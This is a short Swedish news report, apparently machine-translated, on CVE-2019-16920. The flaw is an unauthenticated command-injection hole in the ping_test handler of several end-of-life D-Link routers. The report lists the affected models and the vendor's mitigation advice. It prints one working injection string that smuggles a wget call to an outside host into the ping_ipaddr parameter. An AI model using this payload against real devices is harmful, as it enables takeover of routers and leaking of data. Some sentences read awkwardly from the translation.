Fjärrutnyttjande sårbarhet i D-Link-routrar

I D-Link trådlösa routrar identifieras farlig sårbarhet (CVE-2019-16920), som låter dig köra kod på distans på enhetssidan genom att skicka en speciell begäran till "ping_test"-hanteraren, tillgänglig utan autentisering.

Intressant nog, enligt firmwareutvecklarna, bör "ping_test"-anropet endast köras efter autentisering, men i verkligheten anropas det i alla fall, oavsett om du loggar in i webbgränssnittet. Speciellt när man öppnar skriptet application_sec.cgi och skickar parametern "action=ping_test", omdirigerar skriptet till autentiseringssidan, men utför samtidigt den åtgärd som är associerad med ping_test. För att exekvera koden användes en annan sårbarhet i själva ping_test, som anropar pingverktyget utan att korrekt kontrollera korrektheten av IP-adressen som skickats för testning. För att till exempel anropa verktyget wget och överföra resultatet av kommandot "echo 1234" till en extern värd, specificera bara parametern "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( echo 1234)".

Fjärrutnyttjande sårbarhet i D-Link-routrar

Förekomsten av sårbarheten har officiellt bekräftats i följande modeller:

  • DIR-655 med firmware 3.02b05 eller äldre;
  • DIR-866L med firmware 1.03b04 eller äldre;
  • DIR-1565 med firmware 1.01 eller äldre;
  • DIR-652 (ingen information om problematiska firmwareversioner tillhandahålls)

Supportperioden för dessa modeller har redan löpt ut, så D-Link han uppgav, som inte kommer att släppa uppdateringar för dem för att eliminera sårbarheten, rekommenderar inte att de används och rekommenderar att de ersätts med nya enheter. Som en säkerhetslösning kan du begränsa åtkomsten till webbgränssnittet till endast betrodda IP-adresser.

Det upptäcktes senare att sårbarheten också var det påverkar modellerna DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 och DIR-825, planer på att släppa uppdateringar som ännu inte är kända.

Källa: opennet.ru

Lägg en kommentar